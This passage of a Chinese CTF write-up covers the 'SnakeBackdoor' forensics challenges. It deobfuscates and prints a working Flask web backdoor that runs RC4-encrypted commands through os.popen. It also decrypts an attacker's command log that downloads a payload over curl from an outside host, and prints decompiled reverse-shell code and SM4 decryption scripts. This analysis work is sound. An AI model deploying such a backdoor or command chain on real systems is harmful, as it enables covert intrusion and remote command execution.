3039OMkbyYgqhYwqCZmRL5JYvuNv728exGCrp3lS55AQ2rhn4vwid4WeNLey3Hch2t5kcadVTlCWgEgM60zcz//w+n33///8s/l5TXX2rlLBWTv9vRzNjCTd6Mw0I+S7EcNmy7Td4Q2qQxuWklVwJe'))

太麻烦了,自动检测解码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import re
import base64
import zlib
import ast

def auto_deobfuscate(code_str, layer=1):
    print(f"[*] 正在尝试第 {layer} 层解码...")

    pattern = r'b[\'"](.*?)[\'"]'
    match = re.search(pattern, code_str, re.DOTALL)
    
    if not match:
        print("[-] 未找到符合 b'...' 格式的 payload。")
        return code_str

    payload_str = match.group(1)
    try:
        reversed_payload = payload_str[::-1]
        
        try:
            b64_decoded = base64.b64decode(reversed_payload)
        except Exception:
            print("[!] 反转解码失败,尝试直接 Base64 解码...")
            b64_decoded = base64.b64decode(payload_str)

        decompressed_data = zlib.decompress(b64_decoded)
        
        result_code = decompressed_data.decode('utf-8')
        
        print(f"[+] 第 {layer} 层解码成功!")
        
        if "exec(" in result_code and "b'" in result_code:
            print("[*] 检测到嵌套混淆,继续递归...")
            return auto_deobfuscate(result_code, layer + 1)
        else:
            return result_code

    except Exception as e:
        print(f"[-] 解码过程中出错: {e}")
        return None

target_code = r"""
exec((_)(b'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')"""
print("--- 开始自动化去混淆 ---")
final_code = auto_deobfuscate(target_code)

if final_code:
    print("\n[V] 最终结果如下:\n")
    print("-" * 40)
    print(final_code)
    print("-" * 40)

得到以下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
global exc_class
global code
import os,binascii
exc_class, code = app._get_exc_class_and_code(404)
RC4_SECRET = b'v1p3r_5tr1k3_k3y'
def rc4_crypt(data: bytes, key: bytes) -> bytes:
        S = list(range(256))
        j = 0
        for i in range(256):
                j = (j + S[i] + key[i % len(key)]) % 256
                S[i], S[j] = S[j], S[i]
        i = j = 0
        res = bytearray()
        for char in data:
                i = (i + 1) % 256
                j = (j + S[i]) % 256
                S[i], S[j] = S[j], S[i]
                res.append(char ^ S[(S[i] + S[j]) % 256])
        return bytes(res)
def backdoor_handler():
        if request.headers.get('X-Token-Auth') != '3011aa21232beb7504432bfa90d32779':
                return "Error"
        enc_hex_cmd = request.form.get('data')
        if not enc_hex_cmd:
                return ""
        try:
                enc_cmd = binascii.unhexlify(enc_hex_cmd)
                cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode('utf-8', errors='ignore')
                output_bytes = getattr(os, 'popen')(cmd).read().encode('utf-8', errors='ignore')
                enc_output = rc4_crypt(output_bytes, RC4_SECRET)
                return binascii.hexlify(enc_output).decode()
        except:
                return "Error"
app.error_handler_spec[None][code][exc_class]=lambda error: backdoor_handler()

得到v1p3r_5tr1k3_k3y

flag{v1p3r_5tr1k3_k3y}

SnakeBackdoor-4

题目内容:

攻击者上传了一个二进制后门,请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径

从3中可以看到他要对data数据进行解rc4

1
tcp contains "data="

data=a6bc

data=a3ab330fb285

data=e0ac7e52fc996cc2038c2d7a3899ed

data=acb07e4db7c93ece4bcc37246687ae0649614caa3430ce4b

data=a2ae330da7846599188b26257a88f10b50790cb47e6a97177e1053c351

data=bab6694ba3c938e64b8d257b7cccee460f6347f4363ed21c300c099f129b99028eb57408024e1c32061a

data=acad614ef3d82c8445d275713899f04d0d3819fc3726cf57634b189e0e95cc1f93e57656105246251f453a8396a43a6534

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
data=a6bc
结果为 id

data=a3ab330fb285
结果为 ls -al

data=e0ac7e52fc996cc2038c2d7a3899ed
结果为 /tmp/python3.13

data=acb07e4db7c93ece4bcc37246687ae0649614caa3430ce4b
结果为 chmod +x /tmp/python3.13

data=a2ae330da7846599188b26257a88f10b50790cb47e6a97177e1053c351
结果为 mv /tmp/shell /tmp/python3.13

data=bab6694ba3c938e64b8d257b7cccee460f6347f4363ed21c300c099f129b99028eb57408024e1c32061a
结果为 unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip

data=acad614ef3d82c8445d275713899f04d0d3819fc3726cf57634b189e0e95cc1f93e57656105246251f453a8396a43a6534
结果为 curl 192.168.1.201:8080/shell.zip -o /tmp/123.zip

从上面结果容易看出来本体文件名称为python3.13

flag{python3.13}

SnakeBackdoor-5

题目内容:

请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥(hex,小写字母),结果提交形式:flag{[0-9a-f]+}

从unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip可知解压密码为nf2jd092jd01,解压得到shell文件,用ida打开,查看main函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v3; // eax
  int v5; // [rsp+4h] [rbp-115Ch] BYREF
  unsigned int v6; // [rsp+8h] [rbp-1158h] BYREF
  unsigned int v7; // [rsp+Ch] [rbp-1154h] BYREF
  _DWORD v8[4]; // [rsp+10h] [rbp-1150h] BYREF
  _BYTE v9[128]; // [rsp+20h] [rbp-1140h] BYREF
  _BYTE v10[128]; // [rsp+A0h] [rbp-10C0h] BYREF
  char command[4096]; // [rsp+120h] [rbp-1040h] BYREF
  struct sockaddr s; // [rsp+1120h] [rbp-40h] BYREF
  int v13; // [rsp+1134h] [rbp-2Ch]
  int v14; // [rsp+1138h] [rbp-28h]
  int v15; // [rsp+113Ch] [rbp-24h]
  FILE *stream; // [rsp+1140h] [rbp-20h]
  int v17; // [rsp+1148h] [rbp-18h]
  unsigned int seed; // [rsp+114Ch] [rbp-14h]
  int fd; // [rsp+1150h] [rbp-10h]
  int j; // [rsp+1154h] [rbp-Ch]
  int v21; // [rsp+1158h] [rbp-8h]
  int i; // [rsp+115Ch] [rbp-4h]

  fd = socket(2, 1, 0);
  if ( fd < 0 )
    exit(1);
  memset(&s, 48, sizeof(s));
  s.sa_family = 2;
  *(_DWORD *)&s.sa_data[2] = inet_addr("192.168.1.201");
  *(_WORD *)s.sa_data = htons(0xE59Eu);
  if ( connect(fd, &s, 0x10u) < 0 )
  {
    close(fd);
    exit(1);
  }
  if ( (unsigned int)sub_18ED((unsigned int)fd, &v7, 4, 0) != 4 )
  {
    close(fd);
    exit(1);
  }
  seed = (v7 >> 8) & 0xFF00 | (v7 << 8) & 0xFF0000 | (v7 << 24) | HIBYTE(v7);
  srand(seed);
  for ( i = 0; i <= 3; ++i )
    v8[i] = rand();
  sub_13B4(v10, v8, 0);
  sub_13B4(v9, v8, 1);
  while ( (unsigned int)sub_18ED((unsigned int)fd, &v6, 4, 0) == 4 )
  {
    v6 = (v6 >> 8) & 0xFF00 | (v6 << 8) & 0xFF0000 | (v6 << 24) | HIBYTE(v6);
    if ( v6 <= 0x1000 && v6 && (v6 & 0xF) == 0 )
    {
      v21 = sub_18ED((unsigned int)fd, command, v6, 0);
      if ( v21 != v6 )
        break;
      sub_1860(v10, 0, command, command, v21);
      v17 = (unsigned __int8)command[v21 - 1];
      if ( v17 && v17 <= 16 )
        command[v21 - v17] = 0;
      else
        command[v21] = 0;
      stream = popen(command, "r");
      if ( stream )
      {
        v21 = fread(command, 1u, 0xFFFu, stream);
        pclose(stream);
        command[v21] = 0;
      }
      else
      {
        strcpy(command, "popen failed\n");
        v21 = strlen(command);
      }
      v15 = v21;
      v14 = 16 * (v21 / 16 + 1);
      v13 = v14 - v21;
      for ( j = v21; j < v14; command[j++] = v13 )
        ;
      sub_1860(v9, 1, command, command, v14);
      v5 = (v14 >> 8) & 0xFF00 | (v14 << 8) & 0xFF0000 | (v14 << 24) | (v14 >> 24);
      if ( (unsigned int)sub_197F((unsigned int)fd, &v5, 4, 0) != 4 )
        break;
      v3 = sub_197F((unsigned int)fd, command, v14, 0);
      if ( v14 != v3 )
        break;
    }
  }
  close(fd);
  return 0;
}

其中seed的值是关键

1
2
3
sub_18ED((unsigned int)fd, &v7, 4, 0);
seed = (v7 >> 8) & 0xFF00 | (v7 << 8) & 0xFF0000 | (v7 << 24) | HIBYTE(v7);
srand(seed);

回到流量包查找该值,发现为34952046

为什么是tcp流1827

因为由data=e0ac7e52fc996cc2038c2d7a3899ed,结果为 /tmp/python3.13,该步骤执行在tcp流1826

解密

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdint.h>
#include <iostream>
int main()
{
  uint32_t v8[4];
  srand(0x34952046);
  for (int i = 0; i <= 3; ++i )
    v8[i] = rand();
  for(int i = 0; i < 4; i++)
  {
    printf("%x",v8[i]);
  }
}

得到61fb46ac4f3b310b2d64fc3256b43488

在逆向工程和内存取证中,整数在 x86/x64 内存中是小端序 (Little-Endian) 存储的,经过换序得到:

flag{ac46fb610b313b4f32fc642d8834b456}

SnakeBackdoor-6

可以看到这其实也是data数据

从tcp流1827中提取出加密的命令:

1
2
3
4
5
6
7
49b351855f211b85bd012f80ce8ed5b3
2cc5becb37ca595a89445461c6512efc
b863696da0c6bb28da46e09069dd644f
87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7
b7c88bb0d92308a57f83d08a90ae024c
4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770
7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729

处理逻辑与shell相同,写出解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
import struct

def read_params(path):
    with open(path, 'rb') as f:
        data = f.read()
    sbox = data[0x2020:0x2020+256]
    fk = [struct.unpack_from('<I', data, 0x2120+i*4)[0] for i in range(4)]
    ck = [struct.unpack_from('<I', data, 0x2140+i*4)[0] for i in range(32)]
    return sbox, fk, ck

def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

class SM4:
    def __init__(self, sbox, fk, ck):
        self.sbox = sbox
        self.fk = fk
        self.ck = ck
    
    def tau(self, x):
        b0 = x & 0xFF
        b1 = (x >> 8) & 0xFF
        b2 = (x >> 16) & 0xFF
        b3 = (x >> 24) & 0xFF
        return ((self.sbox[b0] << 24) | 
                (self.sbox[b1] << 16) | 
                (self.sbox[b2] << 8) | 
                self.sbox[b3])
    
    def L(self, x):
        return x ^ rol(x, 2) ^ rol(x, 10) ^ rol(x, 18) ^ rol(x, 24)
    
    def Lp(self, x):
        return x ^ rol(x, 13) ^ rol(x, 23)
    
    def T(self, x):
        return self.L(self.tau(x))
    
    def Tp(self, x):
        return self.Lp(self.tau(x))
    
    def expand(self, key, encrypt):
        if len(key) != 16:
            raise ValueError("Key must be 16 bytes")
        
        K = []
        for i in range(4):
            word = ((key[i*4] << 24) |
                    (key[i*4+1] << 16) |
                    (key[i*4+2] << 8) |
                    key[i*4+3])
            K.append(word ^ self.fk[i])
        
        rk = [0] * 32
        for i in range(32):
            tmp = K[1] ^ K[2] ^ K[3] ^ self.ck[i]
            newk = K[0] ^ self.Tp(tmp)
            
            if encrypt:
                rk[i] = newk
            else:
                rk[31-i] = newk
            
            K = [K[1], K[2], K[3], newk]
        
        return rk
    
    def process(self, rk, block):
        if len(block) != 16:
            raise ValueError("Block must be 16 bytes")
        
        X = []
        for i in range(4):
            word = ((block[i*4] << 24) |
                    (block[i*4+1] << 16) |
                    (block[i*4+2] << 8) |
                    block[i*4+3])
            X.append(word)
        
        for i in range(32):
            tmp = rk[i] ^ X[1] ^ X[2] ^ X[3]
            newx = X[0] ^ self.T(tmp)
            X = [X[1], X[2], X[3], newx]
        
        out = b''
        for i in [3, 2, 1, 0]:
            out += bytes([(X[i] >> 24) & 0xFF,
                         (X[i] >> 16) & 0xFF,
                         (X[i] >> 8) & 0xFF,
                         X[i] & 0xFF])
        return out
    
    def decrypt(self, key, cipher):
        rk = self.expand(key, False)
        result = b''
        for i in range(0, len(cipher), 16):
            block = cipher[i:i+16]
            if len(block) == 16:
                result += self.process(rk, block)
        
        if result:
            pad = result[-1]
            if 0 < pad <= 16:
                result = result[:-pad]
        
        return result

def main():
    binary_path = "shell"
    sbox, fk, ck = read_params(binary_path)
    cipher = SM4(sbox, fk, ck)
    
    key_hex = "ac46fb610b313b4f32fc642d8834b456"
    key_bytes = bytes.fromhex(key_hex)
    
    ciphertext_hex = (
        "49b351855f211b85bd012f80ce8ed5b3"
        "2cc5becb37ca595a89445461c6512efc"
        "b863696da0c6bb28da46e09069dd644f"
        "87e8faa921f3e67c530f1b6740a9d439794e426716d49f5e949d5d56f81ed54a97f6cc6752fcf7aa408a94e6a59029e7"
        "b7c88bb0d92308a57f83d08a90ae024c"
        "4331cfda21eeab8922fcc7acced16d1a17b02e8d2d9dfee48dc8f18e0dbbb2e4c4547e39d8c4aa2418d9fca52c9c4770"
        "7f4b0ef4806983f164af6f46b71d3fce1e3c0bd00c4dd162b72c156f0f3aecd2afcabf551e08380db6fd20316f8a2729"
    )
    ciphertext_hex = ciphertext_hex.replace("\n", "").replace(" ", "")
    ciphertext_bytes = bytes.fromhex(ciphertext_hex)
    
    plaintext = cipher.decrypt(key_bytes, ciphertext_bytes)
    print(plaintext)

if __name__ == "__main__":
    main()

得到结果